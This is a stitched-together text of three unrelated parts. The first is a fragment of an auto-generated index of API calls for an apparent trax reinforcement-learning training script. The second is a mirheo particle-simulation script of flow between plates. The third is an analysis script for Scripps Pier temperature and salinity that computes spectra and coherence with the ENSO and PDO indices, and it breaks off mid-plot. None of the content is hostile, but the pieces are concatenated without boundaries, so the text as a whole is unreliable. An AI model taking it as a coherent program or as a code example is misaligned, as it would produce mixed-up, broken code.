'jax.random.split', 'jax_random.split', (['jax_rng_key'], {}), '(jax_rng_key)\n', (29570, 29583), True, 'from jax import random as jax_random\n'), ((29978, 30069), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Collecting trajectories took %0.2f msec."""', 'trajectory_collection_time'], {}), "(1, 'Collecting trajectories took %0.2f msec.',\n trajectory_collection_time)\n", (29990, 30069), False, 'from absl import logging\n'), ((30915, 30926), 'time.time', 'time.time', ([], {}), '()\n', (30924, 30926), False, 'import time\n'), ((31924, 31935), 'time.time', 'time.time', ([], {}), '()\n', (31933, 31935), False, 'import time\n'), ((31959, 31988), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {}), '(jax_rng_key)\n', (31975, 31988), True, 'from jax import random as jax_random\n'), ((32845, 32881), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {'num': '(2)'}), '(jax_rng_key, num=2)\n', (32861, 32881), True, 'from jax import random as jax_random\n'), ((32886, 32934), 'absl.logging.vlog', 'logging.vlog', (['(2)', '"""Starting to compute P&V loss."""'], {}), "(2, 'Starting to compute P&V loss.')\n", (32898, 32934), False, 'from absl import logging\n'), ((32965, 32976), 'time.time', 'time.time', ([], {}), '()\n', (32974, 32976), False, 'import time\n'), ((33794, 33830), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {'num': '(2)'}), '(jax_rng_key, num=2)\n', (33810, 33830), True, 'from jax import random as jax_random\n'), ((33835, 33883), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Policy and Value Optimization"""'], {}), "(1, 'Policy and Value Optimization')\n", (33847, 33883), False, 'from absl import logging\n'), ((33914, 33925), 'time.time', 'time.time', ([], {}), '()\n', (33923, 33925), False, 'import time\n'), ((33937, 33984), 'jax.random.split', 'jax_random.split', (['key1'], {'num': 'num_optimizer_steps'}), '(key1, num=num_optimizer_steps)\n', (33953, 33984), True, 'from jax 
import random as jax_random\n'), ((37087, 37098), 'time.time', 'time.time', ([], {}), '()\n', (37096, 37098), False, 'import time\n'), ((37695, 37934), 'absl.logging.info', 'logging.info', (['"""Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]"""', 'i', 'min_reward', 'max_reward', 'avg_reward', 'loss_combined', 'loss_value', 'loss_ppo', 'entropy_bonus'], {}), "(\n 'Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]'\n , i, min_reward, max_reward, avg_reward, loss_combined, loss_value,\n loss_ppo, entropy_bonus)\n", (37707, 37934), False, 'from absl import logging\n'), ((3566, 3588), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', (['*tower1'], {}), '(*tower1)\n', (3579, 3588), False, 'from tensor2tensor.trax import layers\n'), ((3598, 3620), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', (['*tower2'], {}), '(*tower2)\n', (3611, 3620), False, 'from tensor2tensor.trax import layers\n'), ((6444, 6456), 'jax.numpy.uint16', 'np.uint16', (['(0)'], {}), '(0)\n', (6453, 6456), True, 'from jax import numpy as np\n'), ((9314, 9353), 'jax.lax.pad', 'lax.pad', (['reward_mask', '(0)', 'padding_config'], {}), '(reward_mask, 0, padding_config)\n', (9321, 9353), False, 'from jax import lax\n'), ((12887, 12954), 'jax.numpy.clip', 'np.clip', (['(value_prediction - value_prediction_old)', '(-epsilon)', 'epsilon'], {}), '(value_prediction - value_prediction_old, -epsilon, epsilon)\n', (12894, 12954), True, 'from jax import numpy as np\n'), ((14032, 14043), 'jax.numpy.array', 'np.array', (['d'], {}), '(d)\n', (14040, 14043), True, 'from jax import numpy as np\n'), ((15596, 15608), 'jax.numpy.arange', 'np.arange', (['T'], {}), '(T)\n', (15605, 15608), True, 'from jax import numpy as np\n'), ((18369, 18388), 'jax.numpy.mean', 'np.mean', (['advantages'], {}), '(advantages)\n', (18376, 18388), True, 'from jax import numpy as np\n'), ((23943, 23957), 'jax.numpy.sum', 'np.sum', (['(lp * p)'], {}), '(lp * p)\n', (23949, 23957), True, 'from jax import numpy as np\n'), ((23960, 23972), 'jax.numpy.sum', 'np.sum', (['mask'], {}), '(mask)\n', (23966, 23972), True, 'from jax import numpy as np\n'), ((28572, 28600), 'jax.random.split', 'jax_random.split', (['rng'], {'num': '(2)'}), '(rng, num=2)\n', (28588, 28600), True, 'from jax import random as jax_random\n'), ((28919, 28955), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {'num': '(2)'}), '(jax_rng_key, num=2)\n', (28935, 28955), True, 'from jax import random as jax_random\n'), ((28963, 29016), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Epoch [% 6d] evaluating policy."""', 'i'], {}), "(1, 'Epoch [% 6d] evaluating policy.', i)\n", (28975, 29016), False, 'from absl import logging\n'), ((34045, 34077), 'jax.random.split', 'jax_random.split', (['keys[j]'], {'num': '(3)'}), '(keys[j], num=3)\n', (34061, 34077), True, 'from jax import random as jax_random\n'), ((34088, 34099), 'time.time', 'time.time', ([], {}), '()\n', (34097, 34099), False, 'import time\n'), ((35450, 35461), 'time.time', 'time.time', ([], {}), '()\n', (35459, 35461), False, 'import time\n'), ((37290, 37338), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Epoch [% 6d] saving model."""', 'i'], {}), "(1, 'Epoch [% 6d] saving model.', i)\n", (37302, 37338), False, 'from absl import logging\n'), ((37359, 37405), 'os.path.join', 'os.path.join', (['output_dir', "('model-%06d.pkl' % i)"], {}), "(output_dir, 'model-%06d.pkl' % i)\n", (37371, 37405), 
False, 'import os\n'), ((3446, 3471), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', (['num_actions'], {}), '(num_actions)\n', (3458, 3471), False, 'from tensor2tensor.trax import layers\n'), ((3473, 3492), 'tensor2tensor.trax.layers.LogSoftmax', 'layers.LogSoftmax', ([], {}), '()\n', (3490, 3492), False, 'from tensor2tensor.trax import layers\n'), ((3514, 3529), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', (['(1)'], {}), '(1)\n', (3526, 3529), False, 'from tensor2tensor.trax import layers\n'), ((8363, 8395), 'numpy.ones_like', 'onp.ones_like', (['r'], {'dtype': 'np.int32'}), '(r, dtype=np.int32)\n', (8376, 8395), True, 'import numpy as onp\n'), ((15573, 15585), 'jax.numpy.arange', 'np.arange', (['B'], {}), '(B)\n', (15582, 15585), True, 'from jax import numpy as np\n'), ((29289, 29358), 'absl.logging.info', 'logging.info', (['"""Epoch [% 6d] Policy Evaluation [%s] = %10.2f"""', 'i', 'k', 'v'], {}), "('Epoch [% 6d] Policy Evaluation [%s] = %10.2f', i, k, v)\n", (29301, 29358), False, 'from absl import logging\n'), ((30181, 30196), 'jax.numpy.sum', 'np.sum', (['traj[2]'], {}), '(traj[2])\n', (30187, 30196), True, 'from jax import numpy as np\n'), ((30237, 30252), 'jax.numpy.sum', 'np.sum', (['traj[2]'], {}), '(traj[2])\n', (30243, 30252), True, 'from jax import numpy as np\n'), ((35197, 35318), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Early stopping policy and value optimization at iter: %d, with approx_kl: %0.2f"""', 'j', 'approx_kl'], {}), "(1,\n 'Early stopping policy and value optimization at iter: %d, with approx_kl: %0.2f'\n , j, approx_kl)\n", (35209, 35318), False, 'from absl import logging\n'), ((36302, 36484), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Combined Loss(value, ppo, entropy_bonus) [%10.2f] -> [%10.2f(%10.2f,%10.2f,%10.2f)]"""', 'cur_combined_loss', 'loss_combined', 'loss_value', 'loss_ppo', 'entropy_bonus'], {}), "(1,\n 'Combined Loss(value, ppo, entropy_bonus) [%10.2f] -> [%10.2f(%10.2f,%10.2f,%10.2f)]'\n , cur_combined_loss, loss_combined, loss_value, loss_ppo, entropy_bonus)\n", (36314, 36484), False, 'from absl import logging\n'), ((36741, 36766), 'jax.numpy.abs', 'np.abs', (['cur_combined_loss'], {}), '(cur_combined_loss)\n', (36747, 36766), True, 'from jax import numpy as np\n'), ((37417, 37447), 'tensorflow.io.gfile.GFile', 'gfile.GFile', (['params_file', '"""wb"""'], {}), "(params_file, 'wb')\n", (37428, 37447), False, 'from tensorflow.io import gfile\n'), ((37462, 37505), 'pickle.dump', 'pickle.dump', (['policy_and_value_net_params', 'f'], {}), '(policy_and_value_net_params, f)\n', (37473, 37505), False, 'import pickle\n'), ((3226, 3241), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', (['(1)'], {}), '(1)\n', (3238, 3241), False, 'from tensor2tensor.trax import layers\n'), ((30489, 30504), 'jax.numpy.sum', 'np.sum', (['traj[2]'], {}), '(traj[2])\n', (30495, 30504), True, 'from jax import numpy as np\n'), ((3165, 3190), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', (['num_actions'], {}), '(num_actions)\n', (3177, 3190), False, 'from tensor2tensor.trax import layers\n'), ((3192, 3211), 'tensor2tensor.trax.layers.LogSoftmax', 'layers.LogSoftmax', ([], {}), '()\n', (3209, 3211), False, 'from tensor2tensor.trax import layers\n'), ((24618, 24633), 'jax.numpy.sum', 'np.sum', (['traj[2]'], {}), '(traj[2])\n', (24624, 24633), True, 'from jax import numpy as np\n'), ((30111, 30126), 'jax.numpy.sum', 'np.sum', (['traj[2]'], {}), '(traj[2])\n', (30117, 30126), True, 'from jax import numpy as np\n')] |
#!/usr/bin/env python
import mirheo as mir
dt = 0.001
ranks = (1, 1, 1)
domain = (8, 16, 8)
force = (1.0, 0, 0)
density = 4
u = mir.Mirheo(ranks, domain, dt, debug_level=3, log_filename='log', no_splash=True)
pv = mir.ParticleVectors.ParticleVector('pv', mass = 1)
ic = mir.InitialConditions.Uniform(number_density=density)
u.registerParticleVector(pv=pv, ic=ic)
dpd = mir.Interactions.Pairwise('dpd', rc=1.0, kind="DPD", a=10.0, gamma=50.0, kBT=1.0, power=0.5)
u.registerInteraction(dpd)
plate_lo = mir.Walls.Plane("plate_lo", (0, 0, -1), (0, 0, 1))
plate_hi = mir.Walls.Plane("plate_hi", (0, 0, 1), (0, 0, domain[2] - 1))
u.registerWall(plate_lo, 0)
u.registerWall(plate_hi, 0)
vv = mir.Integrators.VelocityVerlet("vv")
frozen = u.makeFrozenWallParticles(pvName="plates", walls=[plate_lo, plate_hi], interactions=[dpd], integrator=vv, number_density=density)
u.setWall(plate_lo, pv)
u.setWall(plate_hi, pv)
for p in (pv, frozen):
u.setInteraction(dpd, p, pv)
vv_dp = mir.Integrators.VelocityVerlet_withConstForce("vv_dp", force)
u.registerIntegrator(vv_dp)
u.setIntegrator(vv_dp, pv)
sample_every = 2
dump_every = 1000
bin_size = (1., 1., 0.5)
u.registerPlugins(mir.Plugins.createDumpAverage('field', [pv], sample_every, dump_every, bin_size, ["velocities"], 'h5/solvent-'))
u.run(7002)
# nTEST: walls.analytic.plates
# cd walls/analytic
# rm -rf h5
# mir.run --runargs "-n 2" ./plates.py
# mir.avgh5 xy velocities h5/solvent-0000[4-7].h5 | awk '{print $1}' > profile.out.txt
| [
"mirheo.Interactions.Pairwise",
"mirheo.Mirheo",
"mirheo.Walls.Plane",
"mirheo.ParticleVectors.ParticleVector",
"mirheo.Integrators.VelocityVerlet",
"mirheo.Plugins.createDumpAverage",
"mirheo.InitialConditions.Uniform",
"mirheo.Integrators.VelocityVerlet_withConstForce"
]
| [((134, 219), 'mirheo.Mirheo', 'mir.Mirheo', (['ranks', 'domain', 'dt'], {'debug_level': '(3)', 'log_filename': '"""log"""', 'no_splash': '(True)'}), "(ranks, domain, dt, debug_level=3, log_filename='log', no_splash=True\n )\n", (144, 219), True, 'import mirheo as mir\n'), ((221, 269), 'mirheo.ParticleVectors.ParticleVector', 'mir.ParticleVectors.ParticleVector', (['"""pv"""'], {'mass': '(1)'}), "('pv', mass=1)\n", (255, 269), True, 'import mirheo as mir\n'), ((277, 330), 'mirheo.InitialConditions.Uniform', 'mir.InitialConditions.Uniform', ([], {'number_density': 'density'}), '(number_density=density)\n', (306, 330), True, 'import mirheo as mir\n'), ((381, 477), 'mirheo.Interactions.Pairwise', 'mir.Interactions.Pairwise', (['"""dpd"""'], {'rc': '(1.0)', 'kind': '"""DPD"""', 'a': '(10.0)', 'gamma': '(50.0)', 'kBT': '(1.0)', 'power': '(0.5)'}), "('dpd', rc=1.0, kind='DPD', a=10.0, gamma=50.0,\n kBT=1.0, power=0.5)\n", (406, 477), True, 'import mirheo as mir\n'), ((513, 563), 'mirheo.Walls.Plane', 'mir.Walls.Plane', (['"""plate_lo"""', '(0, 0, -1)', '(0, 0, 1)'], {}), "('plate_lo', (0, 0, -1), (0, 0, 1))\n", (528, 563), True, 'import mirheo as mir\n'), ((588, 649), 'mirheo.Walls.Plane', 'mir.Walls.Plane', (['"""plate_hi"""', '(0, 0, 1)', '(0, 0, domain[2] - 1)'], {}), "('plate_hi', (0, 0, 1), (0, 0, domain[2] - 1))\n", (603, 649), True, 'import mirheo as mir\n'), ((714, 750), 'mirheo.Integrators.VelocityVerlet', 'mir.Integrators.VelocityVerlet', (['"""vv"""'], {}), "('vv')\n", (744, 750), True, 'import mirheo as mir\n'), ((1006, 1067), 'mirheo.Integrators.VelocityVerlet_withConstForce', 'mir.Integrators.VelocityVerlet_withConstForce', (['"""vv_dp"""', 'force'], {}), "('vv_dp', force)\n", (1051, 1067), True, 'import mirheo as mir\n'), ((1210, 1325), 'mirheo.Plugins.createDumpAverage', 'mir.Plugins.createDumpAverage', (['"""field"""', '[pv]', 'sample_every', 'dump_every', 'bin_size', "['velocities']", '"""h5/solvent-"""'], {}), "('field', [pv], sample_every, dump_every,\n bin_size, ['velocities'], 'h5/solvent-')\n", (1239, 1325), True, 'import mirheo as mir\n')] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import abc
import bs4
import functools
import utilities
class Error(Exception):
"""Base exception class that takes a message to display upon raising.
"""
def __init__(self, message=None):
"""Creates an instance of Error.
:type message: str
:param message: A message to display when raising the exception.
"""
super(Error, self).__init__()
self.message = message
def __str__(self):
return unicode(self.message) if self.message is not None else u""
class MalformedPageError(Error):
"""Indicates that a page on MAL has broken markup in some way.
"""
def __init__(self, id, html, message=None):
super(MalformedPageError, self).__init__(message=message)
if isinstance(id, unicode):
self.id = id
else:
self.id = str(id).decode(u'utf-8')
if isinstance(html, unicode):
self.html = html
else:
self.html = str(html).decode(u'utf-8')
def __str__(self):
return "\n".join([
super(MalformedPageError, self).__str__(),
"ID: " + self.id,
"HTML: " + self.html
]).encode(u'utf-8')
class InvalidBaseError(Error):
"""Indicates that the particular resource instance requested does not exist on MAL.
"""
def __init__(self, id, message=None):
super(InvalidBaseError, self).__init__(message=message)
self.id = id
def __str__(self):
return "\n".join([
super(InvalidBaseError, self).__str__(),
"ID: " + unicode(self.id)
])
def loadable(func_name):
"""Decorator for getters that require a load() upon first access.
:type func_name: function
:param func_name: class method that requires that load() be called if the class's _attribute value is None
:rtype: function
:return: the decorated class method.
"""
def inner(func):
cached_name = '_' + func.__name__
@functools.wraps(func)
def _decorator(self, *args, **kwargs):
if getattr(self, cached_name) is None:
getattr(self, func_name)()
return func(self, *args, **kwargs)
return _decorator
return inner
class Base(object):
"""Abstract base class for MAL resources. Provides autoloading, auto-setting functionality for other MAL objects.
"""
__metaclass__ = abc.ABCMeta
"""Attribute name for primary reference key to this object.
When an attribute by the name given by _id_attribute is passed into set(), set() doesn't prepend an underscore for load()ing.
"""
_id_attribute = "id"
def __repr__(self):
return u"".join([
"<",
self.__class__.__name__,
" ",
self._id_attribute,
": ",
unicode(getattr(self, self._id_attribute)),
">"
])
def __hash__(self):
return hash('-'.join([self.__class__.__name__, unicode(getattr(self, self._id_attribute))]))
def __eq__(self, other):
return isinstance(other, self.__class__) and getattr(self, self._id_attribute) == getattr(other, other._id_attribute)
def __ne__(self, other):
return not self.__eq__(other)
def __init__(self, session):
"""Create an instance of Base.
:type session: :class:`myanimelist.session.Session`
:param session: A valid MAL session.
"""
self.session = session
@abc.abstractmethod
def load(self):
"""A callback to run before any @loadable attributes are returned.
"""
pass
def set(self, attr_dict):
"""Sets attributes of this user object.
:type attr_dict: dict
:param attr_dict: Parameters to set, with attribute keys.
:rtype: :class:`.Base`
:return: The current object.
"""
for key in attr_dict:
if key == self._id_attribute:
setattr(self, self._id_attribute, attr_dict[key])
else:
setattr(self, u"_" + key, attr_dict[key])
return self | [
"functools.wraps"
]
| [((1855, 1876), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (1870, 1876), False, 'import functools\n')] |
"""p2 core http responses"""
from wsgiref.util import FileWrapper
from django.http import StreamingHttpResponse
from p2.core.constants import ATTR_BLOB_MIME, ATTR_BLOB_SIZE_BYTES
from p2.core.models import Blob
class BlobResponse(StreamingHttpResponse):
"""Directly return blob's content. Optionally return as attachment if as_download is True"""
def __init__(self, blob: Blob, chunk_size=8192):
super().__init__(FileWrapper(blob, chunk_size))
self['Content-Length'] = blob.attributes.get(ATTR_BLOB_SIZE_BYTES, 0)
self['Content-Type'] = blob.attributes.get(ATTR_BLOB_MIME, 'text/plain')
| [
"wsgiref.util.FileWrapper"
]
| [((434, 463), 'wsgiref.util.FileWrapper', 'FileWrapper', (['blob', 'chunk_size'], {}), '(blob, chunk_size)\n', (445, 463), False, 'from wsgiref.util import FileWrapper\n')] |
"""
Data: Temperature and Salinity time series from SIO Scripps Pier
Salinity: measured in PSU at the surface (~0.5m) and at depth (~5m)
Temp: measured in degrees C at the surface (~0.5m) and at depth (~5m)
- Timestamp included beginning in 1990
"""
# imports
import sys,os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import datetime
from scipy import signal
import scipy.stats as ss
import SIO_modules as SIO_mod
from importlib import reload
reload(SIO_mod)
# read in temp and sal files
sal_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_SALT_1916-201905.txt', sep='\t', skiprows = 27)
temp_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_TEMP_1916_201905.txt', sep='\t', skiprows = 26)
ENSO_data = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx')
ENSO_data_recent = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx')
PDO_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_PDO_data.csv', skiprows = 1)
path_out = '/Users/MMStoll/Python/Output/Ocean569_Output/SIO_Output/'
# convert year, month, day columns to single DATE column
sal_data['DATE'] = pd.to_datetime(sal_data[['YEAR', 'MONTH', 'DAY']])
temp_data['DATE'] = pd.to_datetime(temp_data[['YEAR', 'MONTH', 'DAY']])
ENSO_data_all = ENSO_data.append(ENSO_data_recent[323:], ignore_index = True)
PDO_data['DATE'] = pd.to_datetime(PDO_data['Date'], format='%Y%m')
# remove uncertain data(SURF_FLAG between 1 and 4), replace with NaN, then interpolate
for i in range(0,len(sal_data['SURF_SAL_PSU'])):
if (sal_data['SURF_FLAG'][i] >= 1) and (sal_data['SURF_FLAG'][i] <=4):
sal_data['SURF_SAL_PSU'][i] = np.nan
for i in range(0,len(temp_data['SURF_TEMP_C'])):
	if (temp_data['SURF_FLAG'][i] >= 1) and (temp_data['SURF_FLAG'][i] <=4):
		temp_data['SURF_TEMP_C'][i] = np.nan
# interpolate missing temp and sal data
sal_data['SURF_SAL_PSU'] = sal_data['SURF_SAL_PSU'].interpolate()
temp_data['SURF_TEMP_C'] = temp_data['SURF_TEMP_C'].interpolate()
sal_data['SURF_SAL_PSU'][0] = sal_data['SURF_SAL_PSU'][1]
# remove the average from the sal and temp data and create new columns
sal_data['SURF_SAL_PSU_NOAVG'] = sal_data['SURF_SAL_PSU'] - sal_data['SURF_SAL_PSU'].mean()
temp_data['SURF_TEMP_C_NOAVG'] = temp_data['SURF_TEMP_C'] - temp_data['SURF_TEMP_C'].mean()
# remove trends from the sal and temp data and create new columns
sal_fit = np.polyfit(sal_data.index,sal_data['SURF_SAL_PSU_NOAVG'],1)
sal_fit_fn = np.poly1d(sal_fit)
temp_fit = np.polyfit(temp_data.index,temp_data['SURF_TEMP_C_NOAVG'],1)
temp_fit_fn = np.poly1d(temp_fit)
sal_fit_value = sal_fit_fn(sal_data.index)
temp_fit_value = temp_fit_fn(temp_data.index)
sal_data['SURF_SAL_PSU_DETREND'] = sal_data['SURF_SAL_PSU_NOAVG'] - sal_fit_value
temp_data['SURF_TEMP_C_DETREND'] = temp_data['SURF_TEMP_C_NOAVG'] - temp_fit_value
sal_tri = sal_data['SURF_SAL_PSU_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean()
temp_tri = temp_data['SURF_TEMP_C_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean()
# # 1. FFT the SIO Data
# t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_data['SURF_TEMP_C_DETREND'])
# # 2. Apply butterworth filter to SIO data, with cutoff equal to nyquist freq of enso index
# fs = 1 # sampling frequency, once per day
# fc = 1/60 # cut-off frequency of the filter (cut off periods shorter than 60 days)
# w = fc / (fs / 2) #normalize the frequency
# b, a = signal.butter(4, w, 'low')
# temp_output = signal.filtfilt(b, a, t_spec)
# # 3. Inverse FFT of filtered SIO data
# temp_ifft = np.fft.irfft(temp_output,n=len(temp_output))
# # 4. Subsample new SIO time series with same delta t as ENSO index (once per month)
# temp_ifft_sampled = np.mean(temp_ifft[0:18750].reshape(-1, 30), axis=1)
# temp_ifft_len = temp_ifft_sampled[0:618]
# x = np.linspace(0,18770, 18770)
# plt.figure()
# plt.loglog(x, temp_ifft)
# plt.show()
# butterworth low pass filter for temperature and salinity
fs = 1 # sampling frequency, once per day
fc = 1/500 # cut-off frequency of the filter (cut off periods shorter than 500 days)
w = fc / (fs / 2) #normalize the frequency
b, a = signal.butter(4, w, 'low')
temp_output = signal.filtfilt(b, a, temp_tri)
sal_output = signal.filtfilt(b, a, sal_tri)
temp_sampled = np.mean(temp_output[0:37530].reshape(-1, 30), axis=1) #length = 1251
# create dataframe with spectra for each variable
spectra_temp_df = pd.DataFrame(columns = ['Temp_freq', 'Temp_spec', 'Temp_fft'])
spectra_sal_df = pd.DataFrame(columns = ['Sal_freq', 'Sal_spec', 'Sal_fft'])
spectra_PDO_df = pd.DataFrame(columns = ['PDO_freq', 'PDO_spec', 'PDO_fft'])
spectra_ENSO_df = pd.DataFrame(columns = ['ENSO_freq', 'ENSO_spec', 'ENSO_fft'])
# for coherence, start all records at 1916-01-01
# ENSO data [20:] 1916-09-01 onward, monthly// ends now, through 2019-05-01 [:1254]
# Temp data [10:] 1916-09-01 onward, daily // ends 2019-05-31
# PDO data [752:] 1916-09-01 onward, monthly// ends now, thorugh 2019-05-01 [:1985]
# compute spectral variables for each variable
for j in range(0,4):
data_sets = [temp_sampled, sal_data['SURF_SAL_PSU_DETREND'], PDO_data['Value'][743:], ENSO_data_all['VALUE'][14:]]
freq, spec, spec_amp, fft, delt, freq_T, freq_nyquist = SIO_mod.var_fft(data_sets[j])
if j == 0:
spectra_temp_df['Temp_freq'] = freq
spectra_temp_df['Temp_spec'] = spec
spectra_temp_df['Temp_fft'] = fft
if j == 1:
spectra_sal_df['Sal_freq'] = freq
spectra_sal_df['Sal_spec'] = spec
spectra_sal_df['Sal_fft'] = fft
if j == 2:
spectra_PDO_df['PDO_freq'] = freq
spectra_PDO_df['PDO_spec'] = spec
spectra_PDO_df['PDO_fft'] = fft
if j == 3:
spectra_ENSO_df['ENSO_freq'] = freq
spectra_ENSO_df['ENSO_spec'] = spec
spectra_ENSO_df['ENSO_fft'] = fft
def band_average(fft_var1,fft_var2,frequency,n_av):
# fft_var1 and fft_var2 are the inputs computed via fft
# they can be the same variable or different variables
# n_av is the number of bands to be used for smoothing (nice if it is an odd number)
    # this function is limited to 100,000 points but can easily be modified
nmax=100000
# T_length = (len(fft_var1) * 2 - 2)
# define some variables and arrays
n_spec=len(fft_var1)
n_av2=int(n_av//2+1) #number of band averages/2 + 1
spec_amp_av=np.zeros(nmax)
spec_phase_av=np.zeros(nmax)
freq_av=np.zeros(nmax)
# average the lowest frequency bands first (with half as many points in the average)
sum_low_amp=0.
sum_low_phase=0.
count=0
spectrum_amp=np.absolute(fft_var1*np.conj(fft_var2))#/(2.*np.pi*T_length*delt)
spectrum_phase=np.angle(fft_var1*np.conj(fft_var2),deg=True) #/(2.*np.pi*T_length*delt) don't know if I need the 2pi/Tdeltt here...
#
for i in range(0,n_av2):
sum_low_amp+=spectrum_amp[i]
sum_low_phase+=spectrum_phase[i]
spec_amp_av[0]=sum_low_amp/n_av2
spec_phase_av[0]=sum_low_phase/n_av
# compute the rest of the averages
for i in range(n_av2,n_spec-n_av,n_av):
count+=1
spec_amp_est=np.mean(spectrum_amp[i:i+n_av])
spec_phase_est=np.mean(spectrum_phase[i:i+n_av])
freq_est=frequency[i+n_av//2]
spec_amp_av[count]=spec_amp_est
spec_phase_av[count]=spec_phase_est
freq_av[count]=freq_est
# omega0 = 2.*np.pi/(T_length*delt)
# contract the arrays
spec_amp_av=spec_amp_av[0:count]
spec_phase_av=spec_phase_av[0:count]
freq_av=freq_av[0:count]
return spec_amp_av,spec_phase_av,freq_av,count
n_av = 5
# define terms to compute coherence between temp and ENSO
t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals
t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av)
e_spec_b,e_phase_b,e_freq_av_b,count=band_average(spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_freq'],n_av)
e_fft_star = np.conj(spectra_ENSO_df['ENSO_fft'])
cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,e_fft_star,spectra_ENSO_df['ENSO_freq'],n_av)
coh_sq2=cospec_amp2**2/(t_spec_b*e_spec_b)
# define colors
t_color = 'cadetblue'
s_color = 'darkslateblue'
p_color = 'seagreen'
e_color = 'steelblue'
freq_ann = 2*np.pi/365.25
# plot the coherence and phase between ENSO and temperature
tstr = 'SIO Temperature and ENSO Index \nCoherence and Phase'
im_name = 'SIO_TempENSO_CoherencePhase.jpg'
NR = 2; NC = 1
fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7))
axes[0].semilogx(freq_av2,coh_sq2, color = e_color)
axes[0].set_xlabel('$\omega$ (radians/day)')
axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{ENSO}$')
axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes)
axes[1].semilogx(freq_av2, cospec_phase2, color = e_color)
axes[1].set_xlabel('$\omega$ (radians/day)')
axes[1].set_ylabel('Phase $\it{T}$-$\it{ENSO}$, degrees')
axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes)
axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes)
fig.suptitle(tstr)
# fig.tight_layout(pad=2.0)
plt.savefig(path_out + im_name)
plt.show()
n_av = 5
# define terms to compute coherence between temp and ENSO
#t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals
#t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av)
p_spec_b,p_phase_b,p_freq_av_b,count=band_average(spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_freq'],n_av)
p_fft_star = np.conj(spectra_PDO_df['PDO_fft'])
cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,p_fft_star,spectra_PDO_df['PDO_freq'],n_av)
coh_sq2=cospec_amp2**2/(t_spec_b*p_spec_b)
# plot the coherence and phase between ENSO and temperature
tstr = 'SIO Temperature and PDO Index \nCoherence and Phase'
im_name = 'SIO_TempPDO_CoherencePhase.jpg'
NR = 2; NC = 1
fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7))
axes[0].semilogx(freq_av2,coh_sq2, color = p_color)
axes[0].set_xlabel('$\omega$ (radians/day)')
axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{PDO}$')
axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes)
